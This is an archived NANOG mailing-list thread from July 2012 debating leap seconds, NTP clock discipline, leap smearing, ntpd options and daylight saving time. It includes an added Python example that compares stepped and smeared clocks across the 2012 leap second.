> the leap-second time code. Since it's *their job* to have the correct
> time, they can do all the fancy rarely used things that make parts of
> the Internet die every couple of years.

Ah, Tyler, I see the problem here.

An NTP server is not like an XML-spitting web server which one consults each and every time one wants to know a piece of data (for instance a stock quote, the weather, or in this case, what time it is). NTP assumes a local clock, and the results of periodic queries to higher-than-or-equal-to-local-stratum servers are used to _discipline_ the local clock, steering it to have minimal error.

Local clocks have to be consulted much too frequently (logging, timestamping, etc) for "just put it in the cloud" to work.

You might want to read up on NTP (wikipedia provides a reasonable introduction).
cheers,

-r

From kyle.creyts at gmail.com Wed Jul 4 10:37:07 2012
From: kyle.creyts at gmail.com (Kyle Creyts)
Date: Wed, 4 Jul 2012 11:37:07 -0400
Subject: FYI Netflix is down
In-Reply-To:
References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk> <92F55DE9-EBFF-48D3-B823-5A529A6CF34D@egon.cc> <1C7B96053DD7814496A0D1E71661B68302CF5CEA@SMF-ENTXM-001.sac.ragingwire.net>
Message-ID:

Tell that to people in the third world without utilities.

On Jul 3, 2012 8:32 PM, "Randy Bush" wrote:

> > Also, I don't think there is an acceptable level of downtime for
> > water.
>
> coming soon to a planet near you
>
> randy
>
>

From mysidia at gmail.com Wed Jul 4 10:50:46 2012
From: mysidia at gmail.com (Jimmy Hess)
Date: Wed, 4 Jul 2012 10:50:46 -0500
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <86vci31vtd.fsf@seastrom.com>
References: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com> <93CF45BC-2753-48D4-9AC6-0926DF4AD815@delong.com> <20120704035932.GA20652@puck.nether.net> <86vci31vtd.fsf@seastrom.com>
Message-ID:

On 7/4/12, Robert E. Seastrom wrote:
[snip]
> Local clocks have to be consulted much too frequently (logging,
> timestamping, etc) for "just put it in the cloud" to work.

> You might want to read up on NTP (wikipedia provides a reasonable
> introduction).

The NTP daemon could still provide a configuration option to not implement leap-seconds locally, or ignore the leap-second announcement received.
So the admin can make a tradeoff favoring Stability over Correctness, of _allowing_ the local clock to become 1 second inaccurate for a short time after the rare occasion of a leap second; and step it or slew the local clock, eg include the leap second in the ordinary time correction, averaged over a period of time instead of a 1 second jump.

The breakage doesn't occur for whatever reason when the time is stepped forward or backwards, or slewed. So accept the inaccuracy and correct the clock in the normal way that NTP corrects clocks that have drifted.

--
-JH

From sla at ucolick.org Wed Jul 4 10:58:11 2012
From: sla at ucolick.org (Steve Allen)
Date: Wed, 4 Jul 2012 08:58:11 -0700
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
References: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com> <93CF45BC-2753-48D4-9AC6-0926DF4AD815@delong.com> <20120704035932.GA20652@puck.nether.net> <86vci31vtd.fsf@seastrom.com>
Message-ID: <5AF41F8F-12E3-401A-956E-D02319711858@ucolick.org>

On 2012 Jul 4, at 08:50, Jimmy Hess wrote:
> So accept the inaccuracy and correct the clock in the normal way that
> NTP corrects clocks that have drifted.

This is basically the "leap smear" that google instituted after the issues in 2005. It works nicely in cloud applications where real-time is not an issue. It does not work so well when precision calculations of real-time physics are important, nor in heterogeneous environments where not all devices pay attention to NTP or some handle the leap differently than others. Those are places where a kernel should never be asked to do what the combination of POSIX and leap seconds demand.
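An added illustration (my code, not Google's, ntpd's, or any poster's) of the trade-off Jimmy and Steve describe: a kernel that inserts the leap replays one second and steps, while a smearing time server feeds clients a clock that runs very slightly slow ahead of the leap and never steps. The 24-hour linear window is an assumption; it determines how far off true UTC clients are during the window and by how much their frequency is wrong.

```python
"""Step versus smear across the 2012-06-30 leap second.

Added example, not from any poster, Google, or ntpd.  Both clocks are
driven from a pseudo-TAI count (POSIX seconds plus TAI-UTC, 34 before
and 35 after this leap), so the true elapsed time is always the
difference of the inputs.  The stepped clock replays the 59th second;
the smeared clock spreads the extra second over an assumed 24-hour
window ending at the leap and so stays continuous and monotonic.
"""

TAI_MINUS_UTC_BEFORE = 34
LEAP_TAI = 1341100800 + 35          # pseudo-TAI of 2012-07-01 00:00:00 UTC
SMEAR_WINDOW = 24 * 3600.0          # assumed smear length, in seconds


def stepped_clock(tai):
    """POSIX value from a kernel that inserts the leap by replaying 23:59:59."""
    if tai < LEAP_TAI - 1:
        return tai - TAI_MINUS_UTC_BEFORE
    # From UTC 23:59:60 onward one more second has been absorbed, so the
    # value jumps back by a full second at the start of the leap second.
    return tai - (TAI_MINUS_UTC_BEFORE + 1)


def smear_fraction(tai):
    """Share of the leap second already absorbed at pseudo-TAI instant `tai`."""
    start = LEAP_TAI - SMEAR_WINDOW
    if tai <= start:
        return 0.0
    if tai >= LEAP_TAI:
        return 1.0
    return (tai - start) / SMEAR_WINDOW


def smeared_clock(tai):
    """POSIX value a smearing server would hand out at pseudo-TAI `tai`.

    Equal to the stepped clock outside the window; inside it the clock is
    up to one second ahead of true UTC but never runs backwards.
    """
    return tai - TAI_MINUS_UTC_BEFORE - smear_fraction(tai)


def smear_rate_error_ppm():
    """Frequency error clients run at during the window, parts per million."""
    return 1e6 / SMEAR_WINDOW


def is_monotonic(values):
    """True if no reading is earlier than the one before it."""
    return all(b >= a for a, b in zip(values, values[1:]))


def readings(clock, start, stop, step):
    """Sample `clock` at pseudo-TAI instants start, start+step, ... < stop."""
    out = []
    t = start
    while t < stop:
        out.append(clock(t))
        t += step
    return out


if __name__ == "__main__":
    window = (LEAP_TAI - 2, LEAP_TAI + 1, 0.25)
    print("stepped clock monotonic:", is_monotonic(readings(stepped_clock, *window)))  # False
    print("smeared clock monotonic:", is_monotonic(readings(smeared_clock, *window)))  # True
    print("client frequency error during smear: %.1f ppm" % smear_rate_error_ppm())    # 11.6
```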
--
Steve Allen                    WGS-84 (GPS)
UCO/Lick Observatory           Natural Sciences II, Room 165    Lat +36.99855
University of California       Voice: +1 831 459 3046           Lng -122.06015
Santa Cruz, CA 95064           http://www.ucolick.org/~sla/     Hgt +250 m

From scott at doc.net.au Wed Jul 4 12:22:46 2012
From: scott at doc.net.au (Scott Howard)
Date: Wed, 4 Jul 2012 10:22:46 -0700
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
References: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com> <93CF45BC-2753-48D4-9AC6-0926DF4AD815@delong.com> <20120704035932.GA20652@puck.nether.net> <86vci31vtd.fsf@seastrom.com>
Message-ID:

On Wed, Jul 4, 2012 at 8:50 AM, Jimmy Hess wrote:
> The NTP daemon could still provide a configuration option to not
> implement leap-seconds locally, or ignore the leap-second
> announcement received. So the admin can make a tradeoff favoring
> Stability over Correctness, of _allowing_ the local clock to become 1
> second inaccurate for a short time after the rare occasion of a leap
> second; and step it or slew the local clock, eg include the leap
> second in the ordinary time correction, averaged over a period of
> time instead of a 1 second jump.
>

Unless I'm mis-reading things, it already does - of sorts.

According to the ntpd website (http://www.ntp.org/ntpfaq/NTP-s-algo-real.htm#AEN2499):

*The theory of leap seconds is explained in Q: 2.4.. In reality there are two cases to consider: If the operating system implements the kernel discipline described in Section 5.2, ntpd will announce insertion and deletion of leap seconds to the kernel. The kernel will handle the leap seconds without further action necessary. If the operating system does not implement the kernel discipline, the clock will show an error of one second relative to NTP's time immediately after the leap second. The situation will be handled just like an unexpected change of time: The operating system will continue with the wrong time for some time, but eventually ntpd will step the time.
Effectively this will cause the correction for leap seconds to be applied too late. *

Linux does implement the "kernel discipline" (via ntp_adjtime), so the first option is what normally happens. However you can disable this with an ntpd config option ("disable kernel") or via ntpdc at which point I'm presuming it will fall back to the second option.

The second option still gives you a step, but using the -x option to NTPD will slew this step, giving a gradual correction to the 1 second difference.

Of course there would be side effects of this (the kernel implementation of NTP is there for a reason, and this disables it), but at least it's better than a server hang...

  Scott.

From rbf+nanog at panix.com Wed Jul 4 12:44:40 2012
From: rbf+nanog at panix.com (Brett Frankenberger)
Date: Wed, 4 Jul 2012 12:44:40 -0500
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <49423.1341348864@turing-police.cc.vt.edu>
References: <49423.1341348864@turing-police.cc.vt.edu>
Message-ID: <20120704174439.GA2363@panix.com>

On Tue, Jul 03, 2012 at 04:54:24PM -0400, valdis.kletnieks at vt.edu wrote:
> On Tue, 03 Jul 2012 21:49:40, Peter Lothberg said:
>
> > Leapseconds can be both positive and negative, but up to now, the
> > earth has only slowed down, so we have added seconds.
>
> That's what many people believe, but it's not exactly right. Leap seconds
> are added for the exact same reason leap days are - the earth's rotation
> isn't a clean multiple of the year. We know we need to stick in an entire
> leap day every 4 years or so, then add the 400 hack to get it closer. At
> that point, it's *really* close, to the point where just shimming in a second
> every once in a while is enough to get it back in sync.
>
> The earth's slowdown (or speedup) is measured by *how often* we
> need to add leap seconds. If we needed to add one every 3 years, but
> the frequency rises to once every 2.5 years, *that* indicates slowing.
> In other words, the slowdown or speedup is the first derivative of
> the rate that UT and TAI diverge - if the earth rotated at constant
> speed, the derivative would be zero, and we'd insert leap seconds on
> a nice predictable schedule.

Leap Seconds and Leap Years are completely unrelated and solve two completely different problems.

Leap Seconds exist to adjust time to match the Earth's actual rotation. They exist because the solar day is not exactly 24 hours.

Leap Years exist to adjust time to match the Earth's actual revolution around the Sun. They exist because that time period isn't exactly 365 days.

Without leap seconds, the sun stops being overhead at noon. Without leap years, the equinoxes and solstices start drifting to different days.

--
Brett

From valdis.kletnieks at vt.edu Wed Jul 4 16:02:02 2012
From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu)
Date: Wed, 04 Jul 2012 17:02:02 -0400
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: Your message of "Wed, 04 Jul 2012 12:44:40 -0500." <20120704174439.GA2363@panix.com>
References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com>
Message-ID: <123072.1341435722@turing-police.cc.vt.edu>

On Wed, 04 Jul 2012 12:44:40 -0500, Brett Frankenberger said:
> Leap Seconds and Leap Years are completely unrelated and solve two
> completely different problems.
>
> Leap Seconds exist to adjust time to match the Earth's actual rotation.
> They exist because the solar day is not exactly 24 hours.
>
> Leap Years exist to adjust time to match the Earth's actual revolution
> around the Sun. They exist because that time period isn't exactly
> 365 days.

Actually, it's the same exact problem - an astronomical value isn't exactly conformant to the civil value, and thus adjustments are needed. And you missed the bigger point - that leap seconds aren't needed because the earth is slowing any more than leap days are needed because the year is getting longer.
If an actual sidereal day was a fixed unchanging 86400.005 seconds long, you'd still need a leap second every 200 days. *SLOWING* would be indicated by the "every 200 days" changing to "every 175" or "every 150".

For bonus points - at the current rate of slowing, in what year will the day be of sufficient length that the current "rule of 400" for leap days requires changing? You may assume that the orbital parameters of the Earth do not also change. :)

From bill at herrin.us Wed Jul 4 17:10:45 2012
From: bill at herrin.us (William Herrin)
Date: Wed, 4 Jul 2012 18:10:45 -0400
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <20120704174439.GA2363@panix.com>
References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com>
Message-ID:

On Wed, Jul 4, 2012 at 1:44 PM, Brett Frankenberger wrote:
> Without leap seconds, the sun stops being overhead at noon.

But that's ridiculous. The sun *isn't* overhead at noon except at one particular longitude within each time zone. Everywhere else time synch to local noon is +/- half an hour.

IMO, leap seconds are a really bad idea. Let the vanishingly few people who care about a precision match against the solar day keep track of the deviation from clock time and let everybody else have a *simple* clock year after year. When the deviation increases to an hour every what, thousand years? Then you can do a big, well publicized correction where everybody is paying attention to making it work instead of being caught by surprise.

Regards,
Bill Herrin

--
William D. Herrin ................ herrin at dirtside.com  bill at herrin.us
3005 Crane Dr. ......................
Web:
Falls Church, VA 22042-3004

From jhellenthal at dataix.net Wed Jul 4 17:29:27 2012
From: jhellenthal at dataix.net (Jason Hellenthal)
Date: Wed, 4 Jul 2012 18:29:27 -0400
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com>
Message-ID: <20120704222927.GA19945@DataIX.net>

On Wed, Jul 04, 2012 at 06:10:45PM -0400, William Herrin wrote:
> On Wed, Jul 4, 2012 at 1:44 PM, Brett Frankenberger wrote:
> > Without leap seconds, the sun stops being overhead at noon.
>
> But that's ridiculous. The sun *isn't* overhead at noon except at one
> particular longitude within each time zone. Everywhere else time synch
> to local noon is +/- half an hour.
>
> IMO, leap seconds are a really bad idea. Let the vanishingly few
> people who care about a precision match against the solar day keep
> track of the deviation from clock time and let everybody else have a
> *simple* clock year after year. When the deviation increases to an
> hour every what, thousand years? Then you can do a big, well
> publicized correction where everybody is paying attention to making it
> work instead of being caught by surprise.
>

Yeah but what you don't understand is that manual navigation after a certain point of difference becomes inaccurate to a degree that is unacceptable by most military standards. 100 or a 1000 years the difference is too big. Someone somewhere at some point evaluated this need in the range of "0.3 - 0.9" in order for nautical and other means of direction to not be impacted.

It would be easy to disagree and say "Well! we have GPS and other such digital devices to tell where you are now!"... and if those go out just like all these failing Java Apps ... I would not want to be the guy that would have to calculate all possible differences just to attempt to get an accurate location and then find out the math was wrong and you are 100 miles off target.

Just sayin!
--
- (2^(N-1))

From randy at psg.com Wed Jul 4 17:55:17 2012
From: randy at psg.com (Randy Bush)
Date: Thu, 05 Jul 2012 07:55:17 +0900
Subject: FYI Netflix is down
In-Reply-To:
References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk> <92F55DE9-EBFF-48D3-B823-5A529A6CF34D@egon.cc> <1C7B96053DD7814496A0D1E71661B68302CF5CEA@SMF-ENTXM-001.sac.ragingwire.net>
Message-ID:

> Tell that to people in the third world without utilities.
>>> Also, I don't think there is an acceptable level of downtime for
>>> water.
>> coming soon to a planet near you

i work there regularly. the typical nanog kiddie does not.

randy

From george.herbert at gmail.com Wed Jul 4 18:14:10 2012
From: george.herbert at gmail.com (George Herbert)
Date: Wed, 4 Jul 2012 16:14:10 -0700
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <20120704222927.GA19945@DataIX.net>
References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> <20120704222927.GA19945@DataIX.net>
Message-ID:

On Jul 4, 2012, at 3:29 PM, Jason Hellenthal wrote:
> Yeah but what you don't understand is that manual navigation after a
> certain point of difference becomes inaccurate to a degree that is
> unacceptable by most military standards.

Manual navigation (sextant, etc) is dead. It's not taught for new pilots or mariners / navigators. A few hobbyists still learn that, but they can easily keep a solar-true time clock around if they wish. Maintaining any time standard for that purpose is not supported. It's no reason for the timekeepers, nothing we need to care about.

The few navigation systems that look at the sun and stars have - and inherently need - better time reference than the allowed 0.9 sec before we leap. They already handle this internally.
That 0.9 sec max error comes to up to about 400 meters for equatorial surface nav or 6500 for orbital objects (or suborbital - cough). Already unacceptable...

George William Herbert
Sent from my iPhone

From rbf+nanog at panix.com Wed Jul 4 21:01:50 2012
From: rbf+nanog at panix.com (Brett Frankenberger)
Date: Wed, 4 Jul 2012 21:01:50 -0500
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <123072.1341435722@turing-police.cc.vt.edu>
References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> <123072.1341435722@turing-police.cc.vt.edu>
Message-ID: <20120705020150.GA9247@panix.com>

On Wed, Jul 04, 2012 at 05:02:02PM -0400, valdis.kletnieks at vt.edu wrote:
> On Wed, 04 Jul 2012 12:44:40 -0500, Brett Frankenberger said:
>
> > Leap Seconds and Leap Years are completely unrelated and solve two
> > completely different problems.
> >
> > Leap Seconds exist to adjust time to match the Earth's actual rotation.
> > They exist because the solar day is not exactly 24 hours.
> >
> > Leap Years exist to adjust time to match the Earth's actual revolution
> > around the Sun. They exist because that time period isn't exactly
> > 365 days.
>
> Actually, it's the same exact problem - an astronomical value isn't
> exactly conformant to the civil value, and thus adjustments are needed.

No. Leap Years arise because the solar year is not an integral multiple of the solar day. Yes, you can argue that leap years exist because the Earth doesn't revolve around the sun in 86400*365 seconds, but that missed the underlying point that since well before civil time differed from solar time, people have defined a year in terms of days, preferring not to have years starting at midnight, then dawn, then noon, then dusk, and so on. Leap years have existed since well before civil time and solar time were any different.
> And you missed the bigger point - that leap seconds aren't needed because the
> earth is slowing any more than leap days are needed because the year is getting
> longer. If an actual sidereal day was a fixed unchanging 86400.005 seconds
> long, you'd still need a leap second every 200 days. *SLOWING* would be
> indicated by the "every 200 days" changing to "every 175" or "every 150".

I assume you meant "solar" instead of "[sidereal]" -- the sidereal day hasn't been 86400.anything seconds ever. And if the mean solar day were unchanging, then it would be 86400 civil seconds today, just like it was (by definition) in 1900. The civil second was initially defined as 1/86400 of the mean solar day in 1900 (then later redefined based on radiation from the cesium atom, but the redefinition didn't change the length of the second by enough to matter for the purposes of this discussion). The only reason the mean solar day today isn't 86400 is because the Earth's rotation has slowed since 1900 and we've elected to not redefine the length of a second.

Yes, technically, you're right that if the Earth's rotation rate were constant and were such that the mean solar day were 86400.005 seconds long, we'd still need leap seconds. But that's a highly unlikely counterfactual hypothetical, because, again, if the Earth weren't slowing, then 1/86400-of-mean-solar-day definition of the second would still hold. There's virtually no chance that on a hypothetical Earth that wasn't slowing, that population would have decided that the second should be 1/86400.005 of a solar day.

--
Brett

From valdis.kletnieks at vt.edu Wed Jul 4 21:55:24 2012
From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu)
Date: Wed, 04 Jul 2012 22:55:24 -0400
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: Your message of "Wed, 04 Jul 2012 21:01:50 -0500."
    <20120705020150.GA9247@panix.com>
References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> <123072.1341435722@turing-police.cc.vt.edu> <20120705020150.GA9247@panix.com>
Message-ID: <6572.1341456924@turing-police.cc.vt.edu>

On Wed, 04 Jul 2012 21:01:50 -0500, Brett Frankenberger said:
> No. Leap Years arise because the solar year is not an integral
> multiple of the solar day.

And leap seconds arise because the astronomical day is not an integral multiple of the hour, minute, or second. Same problem.

> still hold. There's virtually no chance that on a hypothetical Earth
> that wasn't slowing, that population would have decided that the
> second should be 1/86400.005 of a solar day.

Look up the *original* definition of the meter, and think about the phrase "measurement error".

From mysidia at gmail.com Wed Jul 4 22:39:17 2012
From: mysidia at gmail.com (Jimmy Hess)
Date: Wed, 4 Jul 2012 22:39:17 -0500
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com>
Message-ID:

On 7/4/12, William Herrin wrote:
> IMO, leap seconds are a really bad idea. Let the vanishingly few
> people who care about a precision match against the solar day keep
> track of the deviation from clock time and let everybody else have a
> *simple* clock year after year. When the deviation increases to an
> hour every what, thousand years? Then you can do a big, well
> publicized correction where everybody is paying attention to making it
> work instead of being caught by surprise.
[snip]

Instead of having leap seconds; redraw the world timezone map, so that the boundaries of every time zone are shifted by a distance in feet that corresponds to one second; and such that after a thousand years and an hour's worth of leap seconds, the physical locations of the timezones will have shifted just so far, that there is a 1 hour adjustment. :)

--
-JH

From owen at delong.com Wed Jul 4 22:48:58 2012
From: owen at delong.com (Owen DeLong)
Date: Wed, 4 Jul 2012 20:48:58 -0700
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com>
Message-ID:

On Jul 4, 2012, at 8:39 PM, Jimmy Hess wrote:
> On 7/4/12, William Herrin wrote:
>
>> IMO, leap seconds are a really bad idea. Let the vanishingly few
>> people who care about a precision match against the solar day keep
>> track of the deviation from clock time and let everybody else have a
>> *simple* clock year after year. When the deviation increases to an
>> hour every what, thousand years? Then you can do a big, well
>> publicized correction where everybody is paying attention to making it
>> work instead of being caught by surprise.
> [snip]
>
> Instead of having leap seconds; redraw the world timezone map, so
> that the boundaries of every time zone are shifted by a distance in
> feet that corresponds to one second; and such that after a thousand
> years and an hour's worth of leap seconds,
> the physical locations of the timezones will have shifted just so
> far, that there is a 1 hour adjustment. :)
>
>
> --
> -JH

Given that we don't seem to be able to eliminate the absurdity of DST, I doubt that either of those proposals is likely to fly.

Owen

From patrick at ianai.net Wed Jul 4 23:24:07 2012
From: patrick at ianai.net (Patrick W. Gilmore)
Date: Thu, 5 Jul 2012 00:24:07 -0400
Subject: ACTA rejected by EU Parliament
Message-ID: <705E80AE-8710-4013-9A18-D95D31FD7AE1@ianai.net>

This is very good news, IMHO.
And operationally relevant, even to North American operators.

--
TTFN,
patrick

From r.engehausen at gmail.com Wed Jul 4 23:47:35 2012
From: r.engehausen at gmail.com (Roy)
Date: Wed, 04 Jul 2012 21:47:35 -0700
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com>
Message-ID: <4FF51C67.2080709@gmail.com>

Rather than discussing the pros and cons of UTC and leap seconds, just create your own time system.

You could call it OpenTime. OpenTime will use NTP servers where the Stratum 1 servers are synced to some time standard that doesn't care about leap seconds. That way the consumer can choose to connect his machines to UTC or OpenTime.

From alter3d at alter3d.ca Thu Jul 5 00:06:31 2012
From: alter3d at alter3d.ca (Peter Kristolaitis)
Date: Thu, 05 Jul 2012 01:06:31 -0400
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <4FF51C67.2080709@gmail.com>
References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> <4FF51C67.2080709@gmail.com>
Message-ID: <4FF520D7.5040201@alter3d.ca>

On 7/5/2012 12:47 AM, Roy wrote:
> Rather than discussing the pros and cons of UTC and leap seconds, just
> create your own time system.
>
> You could call it OpenTime. OpenTime will use NTP servers where the
> Stratum 1 servers are synced to some time standard that doesn't care
> about leap seconds. That way the consumer can choose to connect his
> machines to UTC or OpenTime.
>

Oblig: http://xkcd.com/927/

- Pete

From r.engehausen at gmail.com Thu Jul 5 00:15:45 2012
From: r.engehausen at gmail.com (Roy)
Date: Wed, 04 Jul 2012 22:15:45 -0700
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <4FF520D7.5040201@alter3d.ca>
References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> <4FF51C67.2080709@gmail.com> <4FF520D7.5040201@alter3d.ca>
Message-ID: <4FF52301.5050009@gmail.com>

On 7/4/2012 10:06 PM, Peter Kristolaitis wrote:
> On 7/5/2012 12:47 AM, Roy wrote:
>> Rather than discussing the pros and cons of UTC and leap seconds,
>> just create your own time system.
>>
>> You could call it OpenTime. OpenTime will use NTP servers where the
>> Stratum 1 servers are synced to some time standard that doesn't care
>> about leap seconds. That way the consumer can choose to connect his
>> machines to UTC or OpenTime.
>>
>
> Oblig: http://xkcd.com/927/
>
> - Pete
>
>

Right on!

From joelja at bogus.com Thu Jul 5 00:25:50 2012
From: joelja at bogus.com (joel jaeggli)
Date: Wed, 04 Jul 2012 22:25:50 -0700
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com>
Message-ID: <4FF5255E.9020208@bogus.com>

On 7/4/12 8:48 PM, Owen DeLong wrote:
> Given that we don't seem to be able to eliminate the absurdity of DST,
> I doubt that either of those proposals is likely to fly.
> Owen

Before we had timezones your clock offset was forward or backward 4 minutes every time you crossed a meridian.

From hrlinneweh at sbcglobal.net Thu Jul 5 02:23:11 2012
From: hrlinneweh at sbcglobal.net (Henry Linneweh)
Date: Thu, 5 Jul 2012 00:23:11 -0700 (PDT)
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
References:
Message-ID: <1341472991.9855.YahooMailNeo@web180302.mail.gq1.yahoo.com>

http://www.sciencedaily.com/releases/2012/06/120629142607.htm

________________________________
From: Paul WALL
To: NANOG list
Sent: Saturday, June 30, 2012 6:16 PM
Subject: F-ckin Leap Seconds, how do they work?

Comments?
Drive Slow
Paul

From avg at kotovnik.com Thu Jul 5 04:35:46 2012
From: avg at kotovnik.com (Vadim Antonov)
Date: Thu, 05 Jul 2012 02:35:46 -0700
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com>
Message-ID: <1341480946.9926.3.camel@kotti.kotovnik.com>

On Wed, 2012-07-04 at 20:48 -0700, Owen DeLong wrote:
>
> Given that we don't seem to be able to eliminate the absurdity of DST,
> I doubt that either of those proposals is likely to fly.

Russian govt. did eliminate DST.

http://www.rt.com/news/daylight-saving-time-abolished/

--vadim

From dburk at burkov.aha.ru Thu Jul 5 05:00:02 2012
From: dburk at burkov.aha.ru (Dmitry Burkov)
Date: Thu, 5 Jul 2012 14:00:02 +0400
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <1341480946.9926.3.camel@kotti.kotovnik.com>
References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> <1341480946.9926.3.camel@kotti.kotovnik.com>
Message-ID: <9FB3317F-DB6A-4EF8-A264-4BD5EBEF1B83@burkov.aha.ru>

On Jul 5, 2012, at 1:35 PM, Vadim Antonov wrote:
> On Wed, 2012-07-04 at 20:48 -0700, Owen DeLong wrote:
>>
>> Given that we don't seem to be able to eliminate the absurdity of DST,
>> I doubt that either of those proposals is likely to fly.
>
> Russian govt. did eliminate DST.
>
> http://www.rt.com/news/daylight-saving-time-abolished/

:)
http://themoscownews.com/vote/20120629/189902272-results.html

>
> --vadim
>

From avg at kotovnik.com Thu Jul 5 05:09:44 2012
From: avg at kotovnik.com (Vadim Antonov)
Date: Thu, 05 Jul 2012 03:09:44 -0700
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <9FB3317F-DB6A-4EF8-A264-4BD5EBEF1B83@burkov.aha.ru>
References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> <1341480946.9926.3.camel@kotti.kotovnik.com> <9FB3317F-DB6A-4EF8-A264-4BD5EBEF1B83@burkov.aha.ru>
Message-ID: <1341482984.9926.4.camel@kotti.kotovnik.com>

On Thu, 2012-07-05 at 14:00 +0400, Dmitry Burkov wrote:
> On Jul 5, 2012, at 1:35 PM, Vadim Antonov wrote:
>
> > On Wed, 2012-07-04 at 20:48 -0700, Owen DeLong wrote:
> >>
> >> Given that we don't seem to be able to eliminate the absurdity of DST,
> >> I doubt that either of those proposals is likely to fly.
> >
> > Russian govt. did eliminate DST.
> >
> > http://www.rt.com/news/daylight-saving-time-abolished/
>
> :)
> http://themoscownews.com/vote/20120629/189902272-results.html

75.9% of people are dimwits :)

--vadim

From eugen at leitl.org Thu Jul 5 05:31:05 2012
From: eugen at leitl.org (Eugen Leitl)
Date: Thu, 5 Jul 2012 12:31:05 +0200
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com>
Message-ID: <20120705103105.GZ12615@leitl.org>

On Wed, Jul 04, 2012 at 06:10:45PM -0400, William Herrin wrote:
> IMO, leap seconds are a really bad idea. Let the vanishingly few
> people who care about a precision match against the solar day keep
> track of the deviation from clock time and let everybody else have a
> *simple* clock year after year. When the deviation increases to an
> hour every what, thousand years? Then you can do a big, well
> publicized correction where everybody is paying attention to making it
> work instead of being caught by surprise.

Notice that already InterplaNet requires a time base not linked to a particular planetary body. If we're looking at kiloyear scales, then either nobody will care about celestial dynamics of a particular planetary body, or nobody will care about precise time standards any longer.
From jared at puck.nether.net Thu Jul 5 05:34:55 2012
From: jared at puck.nether.net (Jared Mauch)
Date: Thu, 5 Jul 2012 06:34:55 -0400
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com>
Message-ID:

Live further north and you will see the difference dst makes.

On Jul 4, 2012, at 11:48 PM, Owen DeLong wrote:
> Given that we don't seem to be able to eliminate the absurdity of DST,
> I doubt that either of those proposals is likely to fly.

From nick at foobar.org Thu Jul 5 06:05:54 2012
From: nick at foobar.org (Nick Hilliard)
Date: Thu, 05 Jul 2012 12:05:54 +0100
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com>
Message-ID: <4FF57512.2090208@foobar.org>

On 05/07/2012 11:34, Jared Mauch wrote:
> Live further north and you will see the difference dst makes.

This is true. Ireland, UK, NL, Denmark, northern Germany and northern Poland are at a similar latitude to Polar Bear Provincial Park by Hudson Bay. With DST, we get much more usable evenings March through October, and the sun rises at 05:00 instead of 04:00 in the morning, so early risers don't get woken up at 4 every day. During the winter, regular time means that we have sunrise after 08:30 for 5 weeks. At this latitude, DST is serious win.

Nick

From h.stener at sportradar.com Thu Jul 5 06:18:52 2012
From: h.stener at sportradar.com (Henning Stener)
Date: Thu, 05 Jul 2012 13:18:52 +0200
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <4FF57512.2090208@foobar.org>
References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> <4FF57512.2090208@foobar.org>
Message-ID: <4FF5781C.9030808@sportradar.com>

